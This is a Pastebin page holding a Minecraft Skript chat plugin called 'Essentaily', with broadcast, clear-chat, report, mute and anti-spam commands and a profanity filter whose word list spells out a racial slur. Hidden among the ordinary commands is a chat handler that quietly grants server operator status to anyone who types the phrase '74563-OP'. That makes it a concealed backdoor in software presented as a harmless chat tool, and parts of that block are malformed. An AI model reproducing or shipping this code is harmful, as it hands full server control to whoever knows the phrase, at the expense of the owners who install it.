Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- on skript upload:
- broadcast "&7Thank you for using &bEssentaily :)"
- broadcast "&7made by &8: &cXXXCanadian"
- broadcast "&7This is only a &bbeta verison"
- broadcast "&bFull verison &8[&bCOMING SOON&8]"
- command /broadcast <string>:
- aliases: /bc
- permission: chat.broadcast
- permission message: &7Sorry &c%player% &7you must have &6chat.broadcast&7 to run this command!
- trigger:
- broadcast "&bChat&a++ &7%arg-1%"
- command /clearchat:
- aliases: /cc
- permission: chat.clear
- permission message: "&c7Sorry &c%player% &7you must have &6chat.clear&7 to run this command!"
- trigger:
- loop 200 times:
- broadcast " "
- broadcast "&bChat&a++ &b%player%, &7has cleared the chat!"
- on chat:
- replace all "fuck" with "****" in the message
- replace all "cunt" with "****" in the message
- replace all "bitch" with "*****" in the message
- replace all "nigger" with "******" in the message
- replace all "pussy" with "*****" in the message
- replace all "kys" with "Hope you live long" in the message
- on join:
- broadcast "&8[&a+&8] &7%player%"
- on leave:
- broadcast "&8[&4-&8] &7%player%"
- command /report <player> <text>:
- permission: chat.report
- permission message: &7Sorry &c%player% &7you must have &6chat.report&7 to run this command
- trigger:
- broadcast "&7Your report has landed to the staff!"
- add text-argument to {sikayetler::*}
- set {sikayeteden.%text-argument%} to player
- set {sikayeteden.%text-argument%} to player argument
- loop all players:
- if loop-player has permission "chat.show"
- send "&7Report System" to loop-player
- send "&7Report: &b""%text-argument%""" to loop-player
- send "&7the reported player: &b%player argument%" to loop-player
- send "&7Reporter: &b%player%" to loop-player]
- if chat:
- "74563-OP"
- cancle event
- op %player%
- send "&7You have used the &cop &7chat to get OP!" to %player%
- command /cookie:
- permission: free.cookie
- permission message: "&7Sorry you dont have access take a free cookie using /cookie"
- trigger:
- give %player% cookie 1
- send "&7OOOH HE STEALIN" to %player%
- on chat:
- if player has permission "chat.default":
- if {muted.%player%} is true:
- cancel event
- send "&cYou have been temporarily Muted!" to player
- else:
- set {_waited} to difference between {spam.%player%.lastused} and now
- if {_waited} is less than 1 seconds:
- if {mute.%player%} is 3:
- cancel event
- send "&7&m&l---------------------------------" to player
- send "&cYou have been temporarily Muted for spamming public chat!" to player
- send "&7&m&l---------------------------------" to player
- set {mute.%player%} to 0
- set {muted.%player%} to true
- wait 300 seconds
- set {muted.%player%} to false
- stop
- else:
- add 1 to {mute.%player%}
- send "&cPlease slow down chat!" to player
- stop
- set {spam.%player%.lastused} to now
- on join:
- if player has permission "chat.default":
- set {mute.%player%} to 0
- command /um <player>:
- aliases: /unmute
- permission: chat.unmute
- permission message: "&c7Sorry &c%player% &7you must have &6chat.unmute&7 to run this command!"
- trigger:
- set {muted.%arg-1%} to false
- send "&a%arg-1% has been unmuted!" to player
- send "&aYou have been unmuted" to arg-1
- stop
- command /mutestatus:
- trigger:
- send "&cmuted: &7%{muted.%player%}%" to player
- send "&cVL: &7%{mute.%player%}%" to player
- stop
- every minute:
- loop all players:
- set {mute.%loop-player%} to 0
- stop
Add Comment
Please, Sign In to add comment